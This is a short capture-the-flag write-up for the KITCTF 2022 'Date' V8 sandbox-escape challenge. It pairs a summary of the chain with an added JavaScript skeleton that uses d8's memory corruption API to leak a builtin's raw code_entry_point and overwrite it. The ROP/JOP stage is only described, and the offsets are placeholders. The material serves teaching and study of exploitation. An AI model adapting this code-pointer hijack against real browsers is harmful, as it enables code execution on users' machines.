Tags: v8 pwn kitctfctf exploitation chrome 

The challenge is archived here: [https://2022.ctf.kitctf.de/challenges#Date-2](https://2022.ctf.kitctf.de/challenges#Date-2)

Solution tldr:
- The challenge ships d8 with the V8 sandbox enabled and the memory corruption API exposed, so the starting point is a memory-corruption primitive confined to the sandbox rather than an engine bug
- That gives arbitrary read/write inside the V8 heap, but only within the sandbox; the primitive alone reaches nothing outside it
- JS_FUNCTION objects of builtins (e.g. Math.min, console.log, ...) still hold full raw pointers (not yet sandboxed) into the executable region of the d8 binary, which both leaks the binary's load address and exposes a writable code pointer
- Overwriting Math.min->code->code_entry_point sends the next call of Math.min to a chosen address; a ROP+JOP chain built from gadgets in the d8 executable region does the rest
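
The chain above, as an added example that is not part of the original writeup: build sandbox-relative read/write on top of d8's memory corruption API (`Sandbox.MemoryView`, `Sandbox.getAddressOf`), walk from a builtin JSFunction to its Code object, leak the raw `code_entry_point` and overwrite it. Everything layout-specific is an assumption: the field offsets in `LAYOUT` are placeholders to be read off the target build (for instance with `%DebugPrint` in a `--allow-natives-syntax` d8), `getAddressOf` is taken to return an untagged sandbox offset, and the pointer compression cage is taken to start at the sandbox base so untagged compressed pointers are directly `MemoryView` offsets. Outside d8 the code runs against a constructed fake heap so the logic can be exercised stand-alone.

```javascript
// Added example, not from the original writeup. Skeleton of the chain:
// sandbox-relative read/write, then fn -> code -> code_entry_point overwrite.
// All offsets below are ASSUMED placeholders; read the real ones off the
// target build before using this against it.

// Hypothetical field offsets, shared by the exploit path and the fake heap.
const LAYOUT = {
  jsfunctionCode: 0x18, // JSFunction -> code: compressed tagged pointer (assumed)
  codeEntryPoint: 0x10, // Code -> code_entry_point: raw 64-bit pointer (assumed)
};
const HEAP_OBJECT_TAG = 1;

// Thin read/write layer over a DataView of sandbox memory. Offsets are
// sandbox-relative, which is what Sandbox.getAddressOf is assumed to return.
class SandboxMemory {
  constructor(view, addrof) {
    this.view = view;
    this.addrof = addrof;
  }
  read32(off) { return this.view.getUint32(off, true); }
  read64(off) { return this.view.getBigUint64(off, true); }
  write64(off, val) { this.view.setBigUint64(off, val, true); }
  // Compressed tagged pointer -> sandbox offset. Assumes the pointer
  // compression cage begins at the sandbox base.
  untag(compressed) { return compressed - HEAP_OBJECT_TAG; }
}

// Constructed stand-in for the V8 heap (not a real V8 layout): a "JSFunction"
// at 0x1000 whose code field is a tagged compressed pointer to a "Code" object
// at 0x2000, whose code_entry_point holds a made-up raw pointer.
const FAKE_FN_OFF = 0x1000;
const FAKE_CODE_OFF = 0x2000;
const FAKE_ENTRY = 0x5555deadbeefn;
function makeFakeMemory() {
  const view = new DataView(new ArrayBuffer(0x3000));
  view.setUint32(FAKE_FN_OFF + LAYOUT.jsfunctionCode, FAKE_CODE_OFF | HEAP_OBJECT_TAG, true);
  view.setBigUint64(FAKE_CODE_OFF + LAYOUT.codeEntryPoint, FAKE_ENTRY, true);
  const fn = {}; // stands in for Math.min
  const mem = new SandboxMemory(view, (o) => (o === fn ? FAKE_FN_OFF : -1));
  return { mem, fn };
}

// In a sandbox-enabled d8 with the memory corruption API, map the 4 GiB
// pointer compression cage as a DataView and target the real Math.min.
// Elsewhere (plain node) fall back to the fake heap so the logic still runs.
function makeMemory() {
  if (typeof Sandbox !== 'undefined') {
    const view = new DataView(new Sandbox.MemoryView(0, 0x100000000));
    return { mem: new SandboxMemory(view, (o) => Sandbox.getAddressOf(o)), fn: Math.min };
  }
  return makeFakeMemory();
}

// Sandbox offset of fn's code_entry_point slot. That slot is a full raw
// pointer into the d8 binary, not a sandboxed reference, so it both leaks
// the binary's load address and, once written, decides where the next call lands.
function codeEntryPointSlot(mem, fn) {
  const fnOff = mem.addrof(fn);
  if (fnOff < 0) throw new Error('addrof failed');
  const codeOff = mem.untag(mem.read32(fnOff + LAYOUT.jsfunctionCode));
  return codeOff + LAYOUT.codeEntryPoint;
}

// Overwrite code_entry_point with `gadget` (a raw address, e.g. a pivot in
// d8's text computed from the leak) and return the original pointer.
function hijackCodeEntryPoint(mem, fn, gadget) {
  const slot = codeEntryPointSlot(mem, fn);
  const original = mem.read64(slot);
  mem.write64(slot, gadget);
  return original;
}

// Stand-alone run: only the leak. In d8, hijackCodeEntryPoint(mem, Math.min,
// leaked + gadgetOffset) followed by Math.min() would transfer control.
const { mem, fn } = makeMemory();
const leaked = mem.read64(codeEntryPointSlot(mem, fn));
```

The write lands on a raw pointer that the sandbox does not protect, which is exactly the gap the TL;DR points at; the gadget address passed in must come from the leaked pointer plus an offset measured in the target d8 binary, never from a hard-coded value.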

For a proper explanation, please refer to the full writeup: [https://ju256.de/posts/kitctfctf22-date/](https://ju256.de/posts/kitctfctf22-date/)

Original writeup (https://ju256.de/posts/kitctfctf22-date/).